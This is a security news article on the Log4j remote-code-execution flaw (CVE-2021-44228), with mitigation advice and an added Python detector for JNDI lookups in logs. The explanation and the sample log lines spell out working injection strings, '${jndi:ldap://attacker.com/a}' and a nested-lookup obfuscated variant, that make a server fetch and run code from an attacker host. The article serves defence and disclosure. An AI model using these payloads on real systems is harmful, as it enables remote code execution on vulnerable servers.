Critical vulnerability in Apache Log4j affecting many Java projects

A critical vulnerability has been identified in Apache Log4j, a popular logging framework for Java applications. It allows arbitrary code execution whenever a specially crafted value of the form "${jndi:URL}" is written to the log. The attack works against any Java application that logs data received from outside, for example one that echoes a problematic value back in an error message, so the attacker only needs to get the string into a logged field (a request parameter, a header such as User-Agent, a user name).

It is noted that almost all projects built on frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, as are Steam, Apple iCloud, and Minecraft clients and servers. The vulnerability is expected to trigger a wave of mass attacks on corporate applications, repeating the history of the critical vulnerability in the Apache Struts framework, which, by a rough estimate, is used in the web applications of 65% of Fortune 100 companies. Attempts to scan networks for vulnerable systems have already been recorded.

The problem is aggravated by the fact that a working exploit has already been published, while fixes for the stable branches have not yet been produced. A CVE identifier has not yet been assigned. The fix is so far only included in the test branch log4j-2.15.0-rc1. As a workaround that blocks the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true (for example by passing -Dlog4j2.formatMsgNoLookups=true to the JVM, or by setting the equivalent LOG4J_FORMAT_MSG_NO_LOOKUPS=true environment variable). Note that this setting only exists in Log4j 2.10 and later; older 2.x releases ignore it and must be upgraded or have lookups removed another way.

The root cause is that log4j performs substitution of special "${...}" lookup masks in the strings it writes to the log, and among the supported lookups are JNDI (Java Naming and Directory Interface) queries. The attack comes down to getting a string containing the substitution "${jndi:ldap://attacker.com/a}" logged: while processing it, log4j sends an LDAP request to the server attacker.com asking for the location of a Java class. The location returned by the attacker's server (for example http://second-stage.attacker.com/Exploit.class) is then fetched, loaded and executed in the context of the current process, letting the attacker run arbitrary code on the system with the privileges of the application. Since the substitution happens inside the logging framework, it does not matter whether the application concatenated the value into the message or passed it as a "{}" parameter; both end up being expanded.
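The following detector, added here as an example and not part of the original article or of the Log4j project, scans log lines for the "${jndi:...}" lookup described above. It goes slightly beyond the article in one respect: because log4j resolves lookups recursively, attackers in the wild hide the keyword behind nested lookups such as "${${lower:j}ndi:...}" or the default-value syntax "${::-j}", so the detector first collapses the innermost lookups it knows how to emulate (lower, upper and the ":-" default) before looking for the keyword. The sample lines, host names and IP addresses below are constructed for the example.

```python
import re

# Constructed sample access-log lines (not real traffic). Line 1 carries the
# plain payload in the User-Agent field, line 2 the nested-lookup obfuscation,
# line 3 a harmless lookup that must not be flagged.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.com/a} HTTP/1.1" 404 0',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 0',
]

# One innermost lookup: "${" followed by a body with no nested "${...}" and a "}".
INNER = re.compile(r"\$\{([^${}]*)\}")

# The flat form we are hunting for after normalisation (lookup keys are
# case-insensitive in log4j, hence IGNORECASE).
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def _resolve_one(body):
    """Emulate the lookups attackers use to hide the "jndi" keyword.

    Only the obfuscation-relevant lookups are emulated here (an assumption of
    this example); any other lookup is left untouched so the loop terminates.
    """
    # "${anything:-fallback}" resolves to the fallback when "anything" is unknown.
    if ":-" in body:
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep:
        key = key.lower()
        if key == "lower":
            return value.lower()
        if key == "upper":
            return value.upper()
    return "${" + body + "}"  # unknown lookup: keep as-is


def normalize(text, max_passes=10):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_passes):
        collapsed = INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect_jndi(line):
    """Return the de-obfuscated "${jndi:...}" lookup found in the line, or None."""
    match = JNDI.search(normalize(line))
    return match.group(0) if match else None


def scan(lines):
    """Return (index, lookup) pairs for every line carrying a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        lookup = detect_jndi(line)
        if lookup is not None:
            hits.append((index, lookup))
    return hits


if __name__ == "__main__":
    for index, lookup in scan(SAMPLE_LINES):
        print(f"line {index}: {lookup}")
```

Both the plain and the nested payload normalise to the same "${jndi:ldap://attacker.com/a}", which is also the string worth extracting for blocking the callback host at the egress firewall. Run it over real logs by replacing SAMPLE_LINES with the file's lines; a match on any field that came from the client is a strong indicator of an exploitation attempt, even if the request itself returned 404.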

Addendum 1: The vulnerability has been assigned the identifier CVE-2021-44228.

Addendum 2: A way to bypass the protection added in the log4j-2.15.0-rc1 release has been identified. A new update, log4j-2.15.0-rc2, has been proposed with more complete protection against the vulnerability. The highlighted change in the code concerns the lack of a clean exit when a malformed JNDI URL is used.

Source: opennet.ru
